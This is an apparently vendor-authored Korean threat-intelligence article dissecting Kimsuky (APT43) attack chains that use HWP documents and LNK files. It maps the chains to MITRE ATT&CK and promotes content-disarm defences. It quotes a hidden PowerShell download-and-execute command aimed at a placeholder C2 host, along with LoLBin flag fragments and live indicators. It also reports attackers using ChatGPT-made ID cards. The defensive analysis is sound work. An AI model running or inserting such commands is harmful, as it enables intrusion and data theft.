Kimsuky(APT43) HWP+LNK 연쇄 공격 — 한국 공공·안보 표적 TTP 완전 해부

북한 연계 사이버 첩보 그룹 Kimsuky는 2012년 카스퍼스키의 최초 보고^[1] 이후 14년째 한국 공공·안보·학계를 가장 끈질기게 타격해온 APT다. 2020년 미국 CISA·FBI의 AA20-301A가 "북한 정권의 정보 수집 최전선"으로 규정했고^[2], 2023년 3월 Mandiant가 Kimsuky·Velvet Chollima·Black Banshee·Thallium을 APT43으로 통합 분류했다^[3]. 2023년 5월 미·한·영 3국 공동 AA23-129A^[4]와 6월 국정원·NSA·FBI 한국어 공동 가이드^[5]는 이 그룹 대응을 각국 정부 공식 수준으로 격상시켰다. 이 글은 Kimsuky의 핵심 전달 수단인 HWP+LNK 연쇄 공격을 1차 자료 기반으로 해부한다 — 킬체인 분해, LoLBin 무기화, 페이로드 제품군(BabyShark·AppleSeed·ReconShark·HappyDoor·NUKESPED), MITRE ATT&CK G0094 매핑, 그리고 CDR이 취약점 패치 여부와 무관하게 구조적으로 유효한 이유까지.

G0094

MITRE ATT&CK Group
Kimsuky · 4 aliases^[6]

75%

악성코드 1차 전파 경로
이메일 (시큐레터 분석)^[7]

34ms

SLCDR 무해화 시간
DISARM Intro^[8]

14년

Kimsuky 추적 기간
2012 Kaspersky^[1] → 2026

1 30년째 지속되는 북한 APT의 한국 특화 공격

한국 표적 북한 연계 APT 중 Kimsuky만큼 오래 추적된 그룹은 없다. 2012년 카스퍼스키 보고서^[1]가 C2 이메일 kimsukyang@mail.com에서 이름을 딴 이후, 미·한·영 정부와 Mandiant·CrowdStrike·SentinelOne·PwC·ASEC·Genians·S2W가 각기 별명을 붙여 동일 조직을 추적해왔다. 이 그룹이 한국에 특화된 이유는 명확하다 — 표적 기밀의 대부분이 HWP 포맷으로 생산·유통되기 때문이다. 공격자에게 HWP는 "의심 없이 열리는 문서 컨테이너"이자 "표적이 매일 주고받는 업무 파일"이다. 2025.10 38 North는 이 현실을 이렇게 요약했다^[9].

"HWP is not just software; it is an attack surface woven into the daily functioning of ROK ministries, contractors, and joint programs. The implications extend beyond domestic cybersecurity — HWP vulnerabilities risk undermining the US-ROK alliance's shared cyber posture."

즉 Kimsuky의 HWP 공격은 단순 문서 악용이 아닌 한미 동맹의 사이버 태세 리스크다. 공공기관 보안 담당자가 국가 안보 맥락으로 접근해야 하는 근거다.

2 Kimsuky = APT43 — Mandiant 2023 통합 분류

2023년 3월 28일 Mandiant(Google TI)는 장기 추적 캠페인들을 통합해 APT43을 부여하고 Kimsuky·Velvet Chollima·Black Banshee·Thallium이 동일 조직임을 공식 확인^[3]. 조직 특성 3가지 — ① 전략 정보 수집(한반도 지정학·대북 정책·핵/미사일·미국 한반도 전문가 네트워크), ② 재정적 사이버 범죄 병행(가상자산 탈취로 작전 비용 자체 조달), ③ 사회공학 최정예(개인 맞춤 피싱·가짜 학회·취재 의뢰 장기 빌드업).

별칭	명명 주체	확정 시점	비고
Kimsuky	Kaspersky	2012	C2 이메일 `kimsukyang`에서 유래^[1]
Velvet Chollima	CrowdStrike	2018	"Chollima"(천리마) 시리즈 일부
Black Banshee	PwC	2019	HWP 기반 캠페인 추적
Thallium	Microsoft MSTIC	2019	미 사법부와 76개 도메인 압류(2019.12)
APT43	Mandiant	2023.3	위 4개 통합 분류^[3]
Emerald Sleet	Microsoft (신명명)	2023 이후	기상 테마 명명 정책 전환

💡 왜 통합 분류가 중요한가

같은 조직이 여러 이름으로 불리면 위협 인텔 공유가 단절된다. Mandiant APT43 통합 이후 MITRE ATT&CK G0094에 별칭이 한 페이지로 통합되면서 정부·민간이 동일 TTP 셋을 공유할 수 있게 됐다^[6].

3 역사 — 2012 명명부터 2023 3국 공동 경보까지

2012 — Kaspersky 최초 보고^[1]. 한국 싱크탱크·통일부·세종연구소·국방연구소 침해. C2 무료 메일 ID kimsukyang이 그룹명 유래. HWP 첨부 스피어피싱 이 시점부터 확인.
2019.12 — Microsoft DCU가 버지니아 동부지법 소송으로 Thallium 76개 C2 도메인 법적 압류. 민간이 북한 연계 인프라를 법 절차로 무력화한 첫 대형 사례.
2020.10 — CISA·FBI·Cyber Command AA20-301A^[2]. Kimsuky를 "북한 정권의 글로벌 정보 수집 최전선"으로 규정. 도구 BabyShark·AppleSeed·GoldDragon, 지속성 Run 키·예약 작업 기록.
2023.3 — Mandiant APT43 통합 보고(2장 참조).
2023.5.1 — AA23-129A 3국 5기관 공동 경보^[4]. 미국(CISA·NSA·FBI·국무부)·한국(국정원)·영국(NCSC). 장기 교신 후 첨부 투하, homoglyph 도메인, 피해자 아이덴티티 이중 계정 운영 기법을 공식 기술.
2023.6.1 — 국정원·NSA·FBI 한국어 공동 가이드^[5]. 한국 표적 관점 대응 절차 최초 공식 문서. 이후 공공기관 보안 감사 항목으로 제도화.

2 표적 프로파일 — 한국에만 집중되는 이유

AA23-129A·ASEC·Genians·S2W 교차 대조 시 Kimsuky 표적은 다섯 범주로 수렴:

범주	기관·직군	미끼 유형
정부 부처	외교부·통일부·국방부·국정원	정책 자문, 공식 공문 위장
안보 연구소	KIDA·세종·아산·통일연구원	학술회의 초청, 공동연구 제안
학계	서울대·고려대·연세대 북한학·국제정치	논문 파일, 강연 의뢰서^[10]
특수 분야	핵안보연구소·한국원자력연구원·방산	기술 자문, 계약자 사칭
탈북민·기자	데일리NK·자유아시아방송·탈북자 단체	인터뷰·취재 의뢰^[11]

공통점은 "HWP를 매일 주고받는 직군". AA23-129A가 특별히 경고한 패턴 — "몇 주간 정중한 교신 후 악성 첨부 단 한 건 송부" — 은 시그니처·평판 기반 방어의 근본 취약점이다.

5 공격 체인 상세 — Spearphish → HWP → LNK → PowerShell → C2

Kimsuky의 HWP+LNK 체인은 4~6단계로 분해된다. 각 단계는 MITRE ATT&CK 기법과 매핑된다^[6].

STEP 01 · DELIVERY

스피어피싱 — 장기 빌드업 후 첨부 투하

수 주간의 정중한 사전 교신으로 신뢰 구축 후 첨부 투하. 발신은 공식 기관 도메인 한 글자 오탈자(homoglyph) 또는 무료 메일. 본문은 한국어 자연어로 기계 번역 흔적 없음.

T1566.001 · T1585.002

STEP 02 · LURE

HWP/HWPX 열람 — 디코이 + 임베디드 LNK

HWP 내부에 디코이와 함께 OLE·임베디드 LNK 은닉. 하이퍼링크 클릭 유도도 병행. HWPX 변종은 Contents/·BinData/ 하위에 JSE 스크립트 숨김^[12].

T1204.002 사용자 실행

STEP 03 · EXECUTION

LNK + LoLBin — 정상 바이너리 무기화

LNK Target에 mshta·bitsadmin·rundll32·wmic·certutil 호출 은닉. AV·EDR이 "정상 시스템 명령"으로 분류해 탐지가 구조적으로 어렵다.

T1218.005 · T1197

STEP 04 · DOWNLOADER

PowerShell 2단 다운로더 — 인코딩 원격 페이로드

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand <Base64>. Base64·XOR·GZip 다단 인코딩된 스크립트가 메모리 디코딩 후 Stage-2를 가져온다.

T1059.001 · T1027

STEP 05 · PERSISTENCE

지속성 — Run 키·예약 작업·시작 폴더

HKCU\...\Run, Task Scheduler, 시작 폴더에 OneDrive.exe·GoogleUpdate.exe 사칭명 등록. AA20-301A 기록 표준 기법^[2].

T1547.001

STEP 06 · C2 · EXFIL

페이로드 설치 + 장기 잠복 유출

BabyShark·AppleSeed·ReconShark·HappyDoor 중 하나 설치. 키로깅·스크린샷·자격증명 덤프 후 HTTPS·Dropbox·Yandex·pCloud로 유출. 감염 유지 평균 수개월~1년+.

T1041 · T1567.002

⚠️ 한 체인 안에 6개 탐지 회피 기법

이 체인은 ① 사회공학(평판 기반 우회) · ② OLE 임베딩(문서 내부 은닉) · ③ LoLBin(정상 바이너리 위장) · ④ Base64 인코딩(정적 분석 무력화) · ⑤ 레지스트리 Run 키(저가시성 지속성) · ⑥ 클라우드 C2(방화벽 우회)를 6중으로 포개 탐지 기반 방어를 체계적으로 우회한다. Kimsuky가 14년간 살아남은 이유가 여기 있다.

6 LNK 무기화 기법 — LoLBin 활용

Kimsuky LNK 파일의 Target 필드는 대개 난독화된 문자열로 정상 Windows 바이너리(LoLBin)를 호출한다. ASEC·Genians 샘플 분석 기반 주요 기법:

LoLBin	Kimsuky 악용 방식	MITRE
`mshta.exe`	원격 HTA URL 호출 → JScript/VBScript 인라인 실행	T1218.005
`bitsadmin.exe`	`/transfer` 플래그로 페이로드 다운로드 + 방화벽 우회	T1197
`rundll32.exe`	악성 DLL 또는 JS(`javascript:` protocol handler) 실행	T1218.011
`wmic.exe`	`process call create` PowerShell 우회 + XSL 스크립트	T1220
`certutil.exe`	`-urlcache -split -f` 원격 다운로드 · Base64 디코딩	T1140
`regsvr32.exe`	Squiblydoo — `/s /n /u /i:http://...` 원격 SCT 실행	T1218.010

Genians 샘플^[13]의 LNK Target 예시:

cmd.exe /c start /min powershell -WindowStyle Hidden -Command "iex(iwr 'http://[c2]/update.dat')"

cmd.exe(정상) → PowerShell(정상) → Invoke-WebRequest(정상 cmdlet) → 원격 스크립트. 모든 구성요소가 정상 바이너리·cmdlet이므로 시그니처 매칭이 작동하지 않는다. 이것이 LNK+LoLBin 조합의 본질이다.

7 페이로드 제품군 — BabyShark · AppleSeed · FlowerPower · ReconShark · HappyDoor

2018년 Palo Alto Unit 42의 BabyShark 최초 보고 이후 6개 이상 주요 계열이 활동 중이다.

패밀리	최초 보고	언어·형식	주요 기능	표적
BabyShark	2018.11 Unit 42	VBS 스크립트	시스템 정보 수집, C2 체크인, 2차 페이로드 로더	핵·안보 싱크탱크
AppleSeed	2020 Malwarebytes	C++ Windows 백도어	키로깅, 스크린샷, 파일 수집, 명령 실행, USB 감시	외교·안보 전반
FlowerPower	2021 Cybereason	PowerShell + VBS	다운로더, 자격증명 탈취, 브라우저 쿠키 수집	학계·정부
GoldDragon	2018 McAfee	C++ PE	평창 올림픽 직전 등장, 지속성 + 2차 도구 로더	올림픽 조직위
ReconShark	2023.5 SentinelOne^[14]	VBScript 진화	실행 중 프로세스·배포된 보안 탐지 패턴 수집 → C2 보고 후 맞춤 페이로드 수신	에너지·싱크탱크
HappyDoor	2024.9 ASEC^[15]	C++ 백도어 + VMP	VMP Protector 난독화, MSC 관리콘솔 연계, Bandizip 설치파일 위장	국방 연구자
NUKESPED (NFILO)	2024~2026	DLL 페이로드	JSE 로더 + Base64 이중 디코딩, powershell -decode 호출^[12]	위탁교육·공공

💡 ReconShark의 전술 변곡점

2023년 SentinelOne이 공개한 ReconShark^[14]는 BabyShark 대비 진화 — 감염 단말의 실행 중 프로세스·보안 탐지 설정을 먼저 C2로 보고하면, 공격자가 그 단말에 최적화된 맞춤 페이로드를 내려보낸다. 탐지 회피의 자동화.

8 2024 — MSC 관리콘솔 · HappyDoor · NUKESPED 등장

2024.9 — HWP + MSC 복합 (ASEC 83239)

ASEC 보고서^[10]는 Kimsuky가 "강연의뢰서" 위장 HWP와 .msc(Management Console)를 결합한 캠페인을 공개했다. MSC는 XML 기반 콘솔 파일로 내부 <TaskpadID>에 악성 명령 은닉 가능 — AV·EDR이 거의 점검하지 않는 확장자 공백을 정확히 공략. IoC: MD5 08111135bae27c8aafd08457e95b7380 외 4건, C2 communiquer.be/modules/mod_users_latest/..., Google Drive 파일 제목에 인코딩 명령 삽입.

2024~2026 — NUKESPED (NFILO) 등장

2026년 2월 Shubho57 분석^[12]은 Kimsuky 최신 변종 NUKESPED를 드러냈다. 미끼는 "위탁교육생·건강검진 안내서" 사칭 RAR/ALZ, 로더는 JSE(JScript Encoded) → Base64 이중 디코딩 → PE 추출, 실행은 powershell.exe -windowstyle hidden -noni -decode, 백도어는 NUKESPED DLL. 인프라는 AS54113 Fastly CDN 경유 + 한국 정부 손상 웹사이트를 배포 채널로 악용.

"Base64 data is Base64-decoded twice to extract a Windows PE executable. The loader manipulates XML DOM elements and executes hidden PowerShell commands via powershell.exe -windowstyle hidden -noni -decode." — Shubho57^[12]

9 2025-2026 — ClickFix · QR 피싱 · AI 딥페이크

2025.5-6 — QR 코드 스피어피싱 (Quishing)

Kimsuky가 QR 기반 스피어피싱을 4건 이상 전개 — 이메일에 QR을 삽입해 데스크톱보다 약한 모바일 보안 통제를 우회. 2026.1.8 미국 FBI IC3 공식 경고 발령^[16]. 한국 기원 APT가 미국 정부 공식 경고 수준으로 격상된 사례.

2025.7 — ClickFix + AI 생성 군 ID 카드 (ASEC 89771)

ASEC 2025.7 보고서^[17]의 두 신기법 — ① ClickFix: "CAPTCHA 해결"·"Chrome 업데이트" 등 정당 이유로 사용자가 직접 PowerShell을 복사-붙여넣기 하도록 유도. 실행 주체가 사용자 본인이라 EDR 정책 관대 허용. ② AI 생성 한국 군 ID 카드: ChatGPT로 생성한 신분증 이미지로 사회공학 정당성 부여. AI 사회공학이 실제 표적 공격에 투입된 첫 대규모 사례.

2025.9 — MSC + HappyDoor VMP (ASEC 90651)

국방 연구자 대상 MSC 첨부 스피어피싱, 셸코드가 C&C에서 페이로드 다운로드. HappyDoor 백도어 + VMP Protector 난독화 + Bandizip 설치파일 위장^[15].

2026.2 — HWPX + JSE NUKESPED

NUKESPED 캠페인이 HWPX 포맷으로 확장^[12]. HWPX는 ZIP 기반 XML 아카이브라 내부에 JSE 스크립트를 별도 엔트리로 담을 수 있다. Windows Script Host 기본 활성 환경의 공백을 정확히 공략했다.

10 HWP 공격 세대 비교 — 매크로부터 HWPX+JSE까지

세대	시기	핵심 기법	대응 난이도
1세대 매크로	~2015	HWP 매크로 스크립트 실행	매크로 차단으로 대응
2세대 OLE	2015~2019	HWP 내부 OLE 객체에 PE·스크립트 임베드	OLE 추출·제거 필요
3세대 파싱 취약점	2015~2023	CVE-2015-6585 등 타입 혼동·버퍼 오버플로	패치 배포, EOL 버전은 불가
4세대 LNK 체인	2020~	HWP+LNK → LoLBin → PowerShell 다단계	시그니처 탐지 구조적 한계
5세대 MSC/XML	2024~	HWP+MSC, HWPX+JSE, XML 기반 스크립트 은닉	확장자 기반 방어 무력화
6세대 AI 사회공학	2025~	AI 생성 ID·딥페이크·ClickFix·QR	사용자 교육 한계

11 MITRE ATT&CK G0094 매핑 테이블

MITRE ATT&CK는 Kimsuky를 G0094로 등재하고 있으며, 이 그룹이 공개적으로 확인된 TTP는 60개 이상이다^[6]. HWP+LNK 체인에서 핵심적으로 사용되는 기법을 간추린다.

단계	기법 ID	Kimsuky 구체 사용
Initial Access	T1566.001 Spearphishing Attachment	HWP·HWPX·LNK 첨부
Initial Access	T1566.002 Spearphishing Link	Dropbox·Yandex 링크
Execution	T1204.002 User Execution	HWP 열람·LNK 클릭
Execution	T1059.001 PowerShell	Hidden + EncodedCommand
Execution	T1218.005 Mshta	원격 HTA 호출
Execution	T1197 BITS Jobs	bitsadmin 다운로드
Persistence	T1547.001 Run Keys	HKCU\...\Run
Persistence	T1053.005 Scheduled Task	Task Scheduler 등록
Defense Evasion	T1027 Obfuscated Files	Base64·XOR·GZip 다단
Credential Access	T1555.003 Browser Credentials	Chrome·Edge 자격증명
Collection	T1056.001 Keylogging	AppleSeed
Exfiltration	T1567.002 Cloud Storage Exfil	Dropbox·Yandex·pCloud

12 ASEC / Genians 월별 관찰 추이

시기	출처	핵심 관찰
2023.12	Genians	북한 시장 물가 분석 문서 — HWP·HWPX·LNK·DOCX·XLSX 동시 운영
2024.9	ASEC 83239	강연의뢰서 사칭 HWP+MSC 복합 최초 분석^[10]
2025.3	Genians	Operation ToyBox Story — APT37 파일리스 RoKRAT (Kimsuky 인접)
2025.7	ASEC 89771	ClickFix + AI 군 ID 카드^[17]
2025.9	ASEC 90651	HappyDoor + VMP Protector + Bandizip 위장^[15]
2025.11	ASEC 91524	KimJongRAT 이중 체인(PE+PowerShell), Konni Android+KakaoTalk 결합
2025.12	Genians	Operation Artemis — HWP+OLE+DLL 사이드로딩 최초 확인^[18]
2026.2	Medium / Shubho57	HWPX+JSE NUKESPED 상세 분석^[12]
2026.초	ASEC 93151	LNK 파이썬 백도어 배포 기법 변화

공통 관찰 — "한 캠페인이 끝나면 다음 달에 기법이 바뀐다". 시그니처 중심 방어의 구조적 한계가 이 흐름에서 노출된다.

13 CDR 방어 원리 — HWP 파싱 → LNK 제거 → 매크로·OLE 제거

CDR 3단계 (DISARM 소개서^[8])

파일 스캔 — HWP/HWPX 파서로 분해, 액티브 컨텐츠(스크립트·OLE·매크로·LNK·JSE·PostScript·EPS·DDE·하이퍼링크) 식별
액티브 컨텐츠 제거 — 유형 기반 전면 제거 (판정이 아닌 구조적 처리)
파일 재생성 — 원본 가독성 유지한 채 정규 형태로 재조립

Kimsuky HWP+LNK 체인에 대한 CDR의 6가지 벡터 제거

✅ CDR이 제거하는 Kimsuky 공격 벡터
HWP 내부 임베디드 LNK 전면 제거 — 4세대 LNK 체인의 시작점 원천 차단
OLE 객체 제거 — Operation Artemis류 DLL 사이드로딩 트리거 제거
JSE·VBS·JS·WSF 스크립트 제거 — HWPX+JSE NUKESPED 무력화
MSC XML TaskpadID 제거 — HappyDoor MSC 복합 차단
하이퍼링크 sanitize — 외부 페이로드 다운로드 트리거 제거
매크로·PostScript·EPS·DDE 일괄 제거 후 원본 형태 재조립 — 취약점 존재 여부 무관

왜 체인 ②단계에서 결정적인가

5장 6단계 킬체인에서 ②단계(HWP 열람)에서 LNK가 제거되면 ③④⑤⑥단계가 전부 무효화된다. 사용자가 의심 없이 열어도 트리거 대상이 사라졌기 때문. 시그니처·샌드박스는 "실행 후 탐지"를 목표로 하지만 CDR은 "실행 자체를 불가능하게" 만든다 — "판정하지 않는 방어"의 본질.

패치·AV·샌드박스와의 비교

방어 수단	강점	Kimsuky 대응 한계
한컴 보안 패치	알려진 HWP 취약점 해결	LNK 체인은 취약점 불필요 — 패치 무관 동작
시그니처 AV	알려진 악성코드 탐지	LoLBin + Base64 인코딩에 0% 대응, 변종마다 재생성 필요
샌드박스	일부 행위 관찰	ClickFix·사용자 클릭 조건·시간차 실행에 회피됨
EDR	실행 단계 이상 행동 탐지	감염 시작 후 대응 · ReconShark 맞춤형 페이로드에 취약
CDR	실행 요소 유형 기반 구조적 제거 · 변종 무관 일관성	콘텐츠 수정으로 원본 일부 기능 손실 가능(가독성은 보존)

시큐레터 MARS 엔진은 리버스엔지니어링 기반 파일 분석을 CDR과 결합해 제공한다^[19]. SLE(이메일 보안) + DISARM 조합으로 Kimsuky 체인의 ①②단계를 이메일 게이트에서 차단하는 것이 현재 가장 검증된 배치 패턴이다.

14 대응 로드맵 — 정부·안보연구소·대학별 설계

기관 유형	표적 우선도	권장 방어 구성
최상 외교·안보·방산	Kimsuky(APT43) + APT37 중첩	SLE+DISARM(메일) + MARS 분석 + SLF(망간) + ConTI(인텔)
최상 정부·공공기관	N2SF 범위 + APT 타깃	상동 + CDS 게이트웨이 통합 + 감사 증적 자동화
최상 핵·원자력 연구기관	CISA AA20-301A 명시 표적	SLE+DISARM + SLF(연구망) + MARS + 망분리 확인
상 언론·싱크탱크	AA23-129A 기자·분석가 표적	SLE+DISARM(메일) + 개인 단말 SLCDR 게이트
상 학계·대학	논문·강연 위장 미끼	SLE+DISARM + 공동연구 파일 게이트 + PoC
중 금융·대기업	KB 사칭·재정 동기 공격 확산	SLE+DISARM + 사용자 피싱 훈련

실무 체크리스트

Kimsuky HWP+LNK 대응 준비도

이메일 게이트웨이 CDR 배치HWP/HWPX/LNK 첨부 수신 즉시 무해화
1차 방어선
LNK·JSE·MSC·VBS·WSF 제거 정책HWP 내부 임베디드 + 독립 첨부 양쪽 적용
기법 특화
HWP·HWPX 완전 지원 엔진OLE 스트림 · 임베디드 객체 · PostScript · EPS 분해
국내 포맷 필수
PowerShell 로깅·제한 정책ScriptBlock 로깅 + Constrained Language Mode
③④단계 보조
LoLBin 모니터링mshta·bitsadmin·rundll32·certutil 부모 프로세스 감시
④단계 방어
Kimsuky/APT43 IoC TI 연동BabyShark·AppleSeed·ReconShark·HappyDoor·NUKESPED C2 차단
⑥단계 대응
AA23-129A 반영 피싱 훈련장기 빌드업 교신·도메인 homoglyph 시나리오 모의훈련
사용자 레이어
QR 피싱 대응FBI 2026.1 경고 반영 · 모바일 MDM 통제
2026 신흥
감사 로그 기록제거된 객체 유형·처리 시간·송신자 자동 기록
사후 분석
한미 공동 프로그램 HWP 처리 절차38 North 경고 반영 · 국가 안보 맥락 대응
공공 맥락

15 자주 묻는 질문 (FAQ)

Q1. Kimsuky와 APT43은 같은 조직인가요?

네. 2023.3 Mandiant가 Kimsuky·Velvet Chollima·Black Banshee·Thallium을 APT43으로 통합^[3]. MITRE ATT&CK G0094에도 이 별칭들이 동일 조직으로 등재^[6].

Q2. LNK가 정상 Windows 파일인데 왜 위험한가요?

LNK 구조 자체가 "명령어 실행을 포함하는 설계"입니다. Target에 PowerShell·cmd·외부 URL 호출 저장, 아이콘을 HWP·PDF로 위장 가능. 정상 용도와 악용 용도가 같은 메커니즘을 공유하므로 "정상 파일" 분류가 방어 근거가 되지 못합니다.

Q3. PowerShell을 완전히 차단하면 되지 않나요?

PowerShell은 IT 운영 필수 도구라 전면 차단은 업무 마비. 실질 대응은 ① CDR로 LNK 사전 제거(가장 결정적), ② ScriptBlock 로깅, ③ Constrained Language Mode, ④ AMSI — 4중 구성입니다.

Q4. 샌드박스만으로는 왜 부족한가요?

샌드박스는 "실행 후 관찰"입니다. Kimsuky는 ClickFix(사용자 상호작용 조건)·ReconShark(환경 탐지)로 샌드박스 회피를 표준화했고, 처리 시간이 길어 실시간 이메일 게이트 운영에 구조적으로 부적합합니다. CDR 평균 34ms^[8]와 분 단위 샌드박스는 다른 체급입니다.

Q5. CDR이 LNK를 제거하면 정상 업무 LNK도 사라지나요?

제거 대상은 "문서 내부 임베드 LNK"와 "이메일 첨부 독립 LNK"입니다. 엔드포인트 바탕화면·시작 메뉴 정상 바로가기는 영향받지 않으며, 정책으로 예외 경로·발신자·도메인 세부 제어도 가능합니다.

Q6. HWPX+JSE 같은 신변종에도 CDR이 유효한가요?

네. CDR은 "실행 가능 콘텐츠 유형"을 기준으로 제거하므로 JSE는 Base64 이중 디코딩과 무관하게 유형 자체가 제거 대상입니다. XOR·GZip·커스텀 인코딩을 더해도 JSE 확장자·매직바이트가 식별되는 순간 제거되므로 난독화가 방어 원리에 영향을 주지 않습니다.

Q7. Kimsuky가 왜 유독 한국을 집중 공격하나요?

① 전략 정보 가치(대북 정책·한미 동맹·핵 프로그램), ② HWP 독점 생태계(공공기관 표준 포맷이 공격 표면 자체), ③ 한국어 자연어 구사로 사회공학 정밀도 극대화. 38 North는 이를 한미 동맹의 사이버 태세 리스크로 규정했습니다^[9].

Q8. 2026년 이후 어떻게 진화할까요?

① AI 기반 사회공학 자동화(LLM 개인 맞춤 피싱), ② 모바일 QR·메신저 확산(FBI 2026.1 경고^[16]), ③ 딥페이크 원격 신원 위조, ④ 러시아·중앙아 클라우드 C2 증가, ⑤ HWPX·MSC·JSE 같은 저검사 확장자 추가 발굴. CDR의 구조 기반 접근은 이런 신규 기법에도 원리적으로 작동합니다.

✓ 결론 — 14년의 일관성이 방어의 일관성을 요구한다

2012년 Kimsuky 명명부터 2026년 HWPX+JSE NUKESPED까지 14년간 이 그룹의 공격 원리는 거의 변하지 않았다. Spearphish → 문서 미끼 → 실행 요소 트리거 → 2단 다운로더 → C2 → 장기 잠복. 실행 요소의 형태가 매크로 → OLE → LNK → MSC → JSE로 바뀌었을 뿐, 페이로드 기능(BabyShark·AppleSeed·ReconShark·HappyDoor·NUKESPED)은 대동소이하다. 2020 CISA AA20-301A, 2023 Mandiant APT43, 2023 AA23-129A 3국 공동 경보, 2023 국정원·NSA 공동 가이드, 2025 38 North까지 — 국제·국내 정부기관이 이미 이 위협을 최고 수준으로 격상시켰다.

시그니처·샌드박스·EDR은 기법 변화마다 뒤처진다. 2024년 MSC, 2026년 HWPX+JSE가 등장할 때마다 새 시그니처가 만들어진다. 공격자는 2027년에 다른 확장자로 이동할 것이다. CDR의 "실행 가능 콘텐츠 유형 제거" 원리는 이 고양이-쥐 게임에서 벗어나는 유일한 구조적 접근이다. 14년간 체인 ②단계(문서 열람 시점)는 바뀌지 않았고, 그 지점에서의 LNK·OLE·JSE·MSC 제거 또한 바뀔 이유가 없다. 한컴 패치와 CDR은 대체가 아니라 보완이며, EOL 버전·미패치 공백·제로데이·사용자 교육 실패 전 영역에서 CDR이 구조적 안전망이다.

Kimsuky(APT43) HWP+LNK 대응 준비도 진단

최신 Kimsuky IoC 기반 공격 시뮬레이션 · HWP/HWPX/LNK/MSC/JSE 무해화 품질 PoC · AA23-129A 기반 시나리오 피싱 훈련 · 감사 증적 자동화 설계까지 지원.

APT 대응 진단 신청 → 공공 · 안보연구 · 학계 · 금융 · 한미 공동 프로그램 맞춤

REFERENCES

Kaspersky GReAT, The "Kimsuky" Operation: A North Korean APT?, 2013.9 — securelist.com.
CISA / FBI / Cyber Command, Alert AA20-301A — North Korean Advanced Persistent Threat Focus: Kimsuky, 2020.10.27 — cisa.gov.
Mandiant (Google TI), APT43: North Korean Group Uses Cybercrime to Fund Espionage Operations, 2023.3.28 — cloud.google.com.
CISA / NSA / FBI / US State / ROK NIS / UK NCSC, Alert AA23-129A — DPRK Using Social Engineering and Malware to Target Think Tanks, Academia, and Media, 2023.5.1 — cisa.gov.
국가정보원 / NSA / FBI, 북한 연계 사이버 공격의 소셜 엔지니어링 기법 대응 공동 권고문, 2023.6.1 — nis.go.kr.
MITRE ATT&CK, G0094 Kimsuky (aka Velvet Chollima, Black Banshee, Thallium, APT43) — attack.mitre.org/groups/G0094.
SecuLetter Inc., Ensecure v2 · SecuLetter at a Glance, 2025.12.17 ("Primary Vector for Malware Attacks: email 75%").
SecuLetter Inc., DISARM Solution Introduction KO, 2025.6.13 ("평균 무해화 소요시간: 00:00.034").
38 North (Stimson Center), HWP as an Attack Surface — What Hancom's Hangul Word Processor Means for South Korea's Cyber Posture as a US Ally, 2025.10 — 38north.org.
ASEC, 강연의뢰서로 위장한 Kimsuky 그룹 악성코드 (MSC, HWP), 2024.9.19 — asec.ahnlab.com/ko/83239.
Genians, 외신 인터뷰 의뢰 사칭 김수키 공격 — 2분기 HWP+OLE·LNK·MSC 동향 — genians.co.kr.
Shubho57, Analysis of a JSE File — Kimsuky APT HWPX+JSE NUKESPED, Medium 2026.2 — medium.com.
Genians, 김수키(Kimsuky)그룹의 'BlueShark' 위협 전술 분석 — genians.co.kr.
SentinelOne Labs, Kimsuky Evolves Reconnaissance Capabilities in New Global Campaign — ReconShark, 2023.5 — sentinelone.com.
ASEC, 2025.9 APT 동향 — HappyDoor · VMP 난독화 · Bandizip 위장, 2025.9 — asec.ahnlab.com/ko/90651.
FBI Internet Crime Complaint Center (IC3), Kimsuky QR 코드 스피어피싱 경고 — 미·한 싱크탱크 표적, 2026.1.8 — ic3.gov.
ASEC, 2025.7 APT 동향 — Kimsuky ClickFix · AI 생성 한국 군 ID 카드, 2025.7 — asec.ahnlab.com/ko/89771.
Genians, Operation Artemis — APT37 HWP + OLE + DLL 사이드로딩, 2025.12 — genians.co.kr.
SecuLetter, MARS Platform · Reverse-Engineering-based File Security Technology — seculetter.com.
Palo Alto Networks Unit 42, New BabyShark Malware Targets U.S. National Security Think Tanks, 2019.2 — unit42.paloaltonetworks.com.
Malwarebytes Labs, Kimsuky APT continues to target South Korean government using AppleSeed backdoor, 2021.6 — malwarebytes.com.
Cybereason Nocturnus, Back to the Future: Inside the Kimsuky KGH Spyware Suite, 2020.11 — cybereason.com.
Microsoft DCU, New action to disrupt world's largest online criminal network (Thallium 76 domains), 2019.12.30 — blogs.microsoft.com.
Malware News, Kimsuky KB국민은행 사칭 HWP LNK 분석 — malware.news.

APT 심층 실무 검토가 필요하신가요?

시큐레터 보안연구팀이 현재 환경을 함께 검토합니다. 기밀 유지 보장, 비용 없음.

PoC 신청